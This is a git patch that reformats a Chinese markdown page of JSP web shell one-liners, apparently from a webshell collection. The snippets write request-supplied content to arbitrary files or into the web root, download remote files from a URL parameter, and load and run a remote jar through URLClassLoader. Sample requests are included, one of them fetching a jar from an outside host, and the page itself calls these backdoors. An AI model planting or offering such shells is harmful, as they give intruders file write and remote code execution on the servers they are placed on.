From 04bb4ea2eb6302837ca5db6dc232ef4c9748daf1 Mon Sep 17 00:00:00 2001
From: tennc <tennc@users.noreply.github.com>
Date: Fri, 19 Dec 2014 17:17:55 +0800
Subject: [PATCH] Update catjsp.md

---
 jsp/cat/catjsp.md | 21 ++++++++++++---------
 1 file changed, 12 insertions(+), 9 deletions(-)

diff --git a/jsp/cat/catjsp.md b/jsp/cat/catjsp.md
index f7a1028..e2d746b 100644
--- a/jsp/cat/catjsp.md
+++ b/jsp/cat/catjsp.md
@@ -1,30 +1,35 @@
 ###把字符串编码后写入指定文件的：
 
 1.1
-````<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>````
+
+    <%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
+
 请求：http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
 
 写入web目录：
 
 1.2
-````<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>````
+
+    <%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
+
 请求：http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
 
-
-
 2.1
-````<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>````
+
+    <%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
+
 请求：http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
 
 写入web目录:
 
 2.2
-````<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>````
+
+    <%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
+    
 请求：http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
 
 ###下载远程文件(不用apache io utils的话没办法把inputstream转byte,所以很长…)
 
-
     <%
         java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();
         byte[] b = new byte[1024];
@@ -40,7 +45,6 @@
 
 下载到web路径:
 
-
     <%
         java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();
         byte[] b = new byte[1024];
@@ -58,7 +62,6 @@
 
 如果嫌弃上面的后门功能太弱太陈旧可以试试这个：
 
-
     <%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{request.getParameterMap()})%>
 
 请求：http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A